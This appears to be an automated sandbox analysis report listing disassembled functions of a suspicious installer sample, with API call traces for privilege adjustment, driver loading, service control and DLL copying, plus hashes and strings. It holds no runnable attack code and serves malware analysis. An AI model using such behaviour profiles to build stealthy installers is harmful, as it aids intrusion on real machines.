                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$InformationLookupPrivilegeProcess$AdjustCloseCurrentHandleNameOpenPrivilegesValue_free_malloc
                                                                                                                        • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s$SeLoadDriverPrivilege
                                                                                                                        • API String ID: 4256453065-2784006985
                                                                                                                        • Opcode ID: a7e46fbad52352395777fde3959c24628216e22155be10e2d418e2e97b65f88a
                                                                                                                        • Instruction ID: 4bdd7f160c754e8a70ebd96cbd4996a4a308eeaa2e4c175b99820577840b9908
                                                                                                                        • Opcode Fuzzy Hash: a7e46fbad52352395777fde3959c24628216e22155be10e2d418e2e97b65f88a
                                                                                                                        • Instruction Fuzzy Hash: E9413CB1910228AFDB24DB64DD45FAAB7BCEF45700F0041D9EA0D93241DBB45E85CFA1
                                                                                                                        Function 00B2CB70 Relevance: 19.9, APIs: 1, Strings: 12, Instructions: 363stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrcmpiW.KERNEL32(?,00B74BF8), ref: 00B2CDEF
                                                                                                                          • Part of subcall function 00B2B310: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B2B389
                                                                                                                          • Part of subcall function 00B2B310: GetLastError.KERNEL32 ref: 00B2B39B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastManagerOpenlstrcmpi
                                                                                                                        • String ID: (null)$Application\PCIapp$C:\Windows\Installer\$Do Install (%d), params=<%s>$Done Install$PCIAX.DLL$Software\Microsoft\Windows\CurrentVersion\Uninstall\ProxyHost$System\PCIsys$gdihook4$iRemovedTS=%d$localmon$pcimon
                                                                                                                        • API String ID: 1860037224-981188071
                                                                                                                        • Opcode ID: 9ae98d742457ffa568b7ae665cc177053166adcd47648dba39d77719faa5b5e4
                                                                                                                        • Instruction ID: 99ff0b53d8e012b76ada643c93f4c48c448d02c60b28520182127800bc73ff03
                                                                                                                        • Opcode Fuzzy Hash: 9ae98d742457ffa568b7ae665cc177053166adcd47648dba39d77719faa5b5e4
                                                                                                                        • Instruction Fuzzy Hash: BFC128B1D0023596EB207B64BE46BAE3AD4DF10744F0541F5ED0DA7292EBB49D84C6E2
                                                                                                                        Function 00B24AF0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 129fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00B24B11
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B24B6E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B24B80
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,000000F6), ref: 00B24B95
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B24BDD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B24BE9
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B24C71
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseFirst$CopyDirectoryModuleNameSystem
                                                                                                                        • String ID: localmon$localmon.dll$pcimon$pcimon.dll
                                                                                                                        • API String ID: 958704277-202963052
                                                                                                                        • Opcode ID: db4135dc0dc9280b218598f15c664ea961e681db2e0d6f04ee3f8971efda7524
                                                                                                                        • Instruction ID: 5f3e162764881f3b6f00d8779481515a57c1cf6fd0935c8b64b4e548638b9241
                                                                                                                        • Opcode Fuzzy Hash: db4135dc0dc9280b218598f15c664ea961e681db2e0d6f04ee3f8971efda7524
                                                                                                                        • Instruction Fuzzy Hash: AC41E5719012259BCB20DB68DC55BAA73B9FF80710F1082E8E51D676C1EF71AE46CF90
                                                                                                                        Function 00B244C0 Relevance: 18.1, APIs: 12, Instructions: 114windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B244E1
                                                                                                                        • IsIconic.USER32(?), ref: 00B244EE
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00B244FD
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00B24512
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00B24519
                                                                                                                        • IsIconic.USER32(?), ref: 00B24543
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B24552
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00B24578
                                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00B24588
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00B24594
                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00B245A4
                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00B245BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem$RectWindow$Iconic$Client
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2775841378-0
                                                                                                                        • Opcode ID: c6e5ebfa44493326633ceea65465e303c6319797f886323709437861d70bdef2
                                                                                                                        • Instruction ID: 46e428e6132b3c96f10cbd6649dfc9ab4c61b6fe547c437a9b71ab43fe202b47
                                                                                                                        • Opcode Fuzzy Hash: c6e5ebfa44493326633ceea65465e303c6319797f886323709437861d70bdef2
                                                                                                                        • Instruction Fuzzy Hash: DE415E31A002299FCF10DFA9DD45AEEBBF9EF98700F154158E509F7294DB74AD018B94
                                                                                                                        Function 00B16A30 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(?), ref: 00B16A37
                                                                                                                        • GlobalAlloc.KERNEL32(00002002,?), ref: 00B16A69
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B16A72
                                                                                                                        • _memmove.LIBCMT ref: 00B16A7B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B16A84
                                                                                                                        • EmptyClipboard.USER32 ref: 00B16A8A
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00B16A93
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B16A9E
                                                                                                                        • MessageBeep.USER32(00000030), ref: 00B16AA6
                                                                                                                        • CloseClipboard.USER32 ref: 00B16AAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3255624709-0
                                                                                                                        • Opcode ID: a784a5fe9d90772627119e0e58c27faddeea7bc776a296f58eb5dfbabcce79a1
                                                                                                                        • Instruction ID: b0888a2b4d6bb68ba1936a6d85f17385bfe3832702749afbbad6fff84ea0f9f6
                                                                                                                        • Opcode Fuzzy Hash: a784a5fe9d90772627119e0e58c27faddeea7bc776a296f58eb5dfbabcce79a1
                                                                                                                        • Instruction Fuzzy Hash: 9F017136100304AFDB116FA4EC4EDDB3BACEF59745B044455FA0AC72A1DAB49A41CBB1
                                                                                                                        Function 00B1A6C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95librarymemoryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B1A71E
                                                                                                                        • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00B1A730
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00B1A762
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00B1A782
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1A78D
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B1A7B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary$AddressAllocateErrorInitializeLastLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: Advapi32.dll$CheckTokenMembership
                                                                                                                        • API String ID: 617507591-3257277533
                                                                                                                        • Opcode ID: 676359a5a5c7f85129cbe133f95668f5d04098c7d9569ff03078ebbf7b7a158b
                                                                                                                        • Instruction ID: 419115cdb08f7dd2e487bd52d4701023198208bc91a1c39e6d757636dcffae7d
                                                                                                                        • Opcode Fuzzy Hash: 676359a5a5c7f85129cbe133f95668f5d04098c7d9569ff03078ebbf7b7a158b
                                                                                                                        • Instruction Fuzzy Hash: E63129B1D01209AFCB109FD9D8C9AAEFBF8FB48710F50446EE519A3290DB7469408B61
                                                                                                                        Function 00B08FB0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000002), ref: 00B08FC2
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B08FCF
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00B08FD8
                                                                                                                        • GetDC.USER32(00000000), ref: 00B08FE2
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B0900E
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B09015
                                                                                                                        • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00B0902C
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B09037
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0903E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Palette$BitmapCreateDeleteFindLoadLockObjectRealizeReleaseSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3264011865-0
                                                                                                                        • Opcode ID: 91b1b0eaa2dde224364984e9863b3bdc4b1149c9262f8f1258c5bebd6ed70804
                                                                                                                        • Instruction ID: afc9dbefe538886a939d03318ac8d754976aa291e2ccf2749fe1870f01f425e1
                                                                                                                        • Opcode Fuzzy Hash: 91b1b0eaa2dde224364984e9863b3bdc4b1149c9262f8f1258c5bebd6ed70804
                                                                                                                        • Instruction Fuzzy Hash: B4115EB1640211BBD7106FA59C4DFBB7BFCEF8AB51F104059FA05D7290EAB89C0187A0
                                                                                                                        Function 00AF8380 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 127comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AF83BC
                                                                                                                        • CoCreateInstance.OLE32(00B6B4B8,00000000,00000001,00B6B4D4,?), ref: 00AF8402
                                                                                                                        • CoUninitialize.OLE32 ref: 00AF84DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                                        • String ID: Disabled $Enabled $Removed
                                                                                                                        • API String ID: 948891078-2230107431
                                                                                                                        • Opcode ID: 2fdc9923df5cb40e2bd8eb6fbc776bcb1f8f1574c492e66e9f435540a9ae9199
                                                                                                                        • Instruction ID: d2b8c838cb7d4b06229ab28d2d15198be22f3984bec13f0af40dfef5d94ad6bd
                                                                                                                        • Opcode Fuzzy Hash: 2fdc9923df5cb40e2bd8eb6fbc776bcb1f8f1574c492e66e9f435540a9ae9199
                                                                                                                        • Instruction Fuzzy Hash: DA41AD7190020DDFDB20DF94CC85EBAB3B4FB14705F1445A9FA0AA7291DB78AE44CB91
                                                                                                                        Function 00B24420 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B24459
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B24460
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00B24475
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B24499
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00B244A3
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentExitLoadLookupOpenPrivilegePrivilegesStringValueWindowswvsprintf
                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                        • API String ID: 4148835054-3733053543
                                                                                                                        • Opcode ID: 004750e46fe8665a5f07294e20ded0614688cb38da8f78a6bd4123893e30c4f7
                                                                                                                        • Instruction ID: 7dc3bde6343acf242a0556e35bba3c383b1295be7d3255889c0e23e47d24fd27
                                                                                                                        • Opcode Fuzzy Hash: 004750e46fe8665a5f07294e20ded0614688cb38da8f78a6bd4123893e30c4f7
                                                                                                                        • Instruction Fuzzy Hash: A0012D70A40319ABEB10EFD0DC4ABAD77B8EB04701F504058F60AAB2D1EFF45544CBA6
                                                                                                                        Function 00AFEAB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00AFEAC6
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AFEACD
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 00AFEAE2
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00AFEB06
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AFEB10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID: SeLoadDriverPrivilege
                                                                                                                        • API String ID: 3038321057-497486668
                                                                                                                        • Opcode ID: 9376d18a8dc2ea23522fbd3d1e3e46727a540109ac63786eaf4bc937ba1b014c
                                                                                                                        • Instruction ID: 72b8014c0046e879c1b81e1ebf2f849fc784003c2e976b361665c909264a7ba9
                                                                                                                        • Opcode Fuzzy Hash: 9376d18a8dc2ea23522fbd3d1e3e46727a540109ac63786eaf4bc937ba1b014c
                                                                                                                        • Instruction Fuzzy Hash: 0F011271A40309ABDB00DFD4DD4AFAE77BCAB48701F500148F605A72D0DFB46504CBA5
                                                                                                                        Function 00B52744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000,00000000), ref: 00B52783
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000,00000000), ref: 00B527AC
                                                                                                                        • GetACP.KERNEL32(?,?,00B52DAD,?,00B43632,?,000000BC,?,00000001,00000000), ref: 00B527C0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: 663bfed09c47157e865e8ad37b3265aca769c39ab64115254f1ce2541c4fdc37
                                                                                                                        • Instruction ID: 8346565e548765dba3756a5f0b10b9cb9b5cf6b9f4f1c2c7470dc71275d881a6
                                                                                                                        • Opcode Fuzzy Hash: 663bfed09c47157e865e8ad37b3265aca769c39ab64115254f1ce2541c4fdc37
                                                                                                                        • Instruction Fuzzy Hash: 2601B13060230ABBEB11DB60AD56B9A77E9DF0675AF2040D5EA01F20D0EB70CE449654
                                                                                                                        Function 00B382B3 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B3FA2B
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3FA40
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00B7B7A0), ref: 00B3FA4B
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3FA67
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B3FA6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: ce5602ae6fa80233e95581c99ec1a6d8603423f5a57dd90b501c4faecc9f86e8
                                                                                                                        • Instruction ID: 097822c962ee35f87ddbd2f95be9b2cf3a8cd25934d4689d3cf051f7040eb094
                                                                                                                        • Opcode Fuzzy Hash: ce5602ae6fa80233e95581c99ec1a6d8603423f5a57dd90b501c4faecc9f86e8
                                                                                                                        • Instruction Fuzzy Hash: DE21AAB9C02204AFD745DF68EE89B487BB4BB18304F90405BE808973B0EFB45985CF65
                                                                                                                        Function 00AFC060 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(000F01FF), ref: 00AFC08D
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AFC094
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AFC0A5
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 00AFC0C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
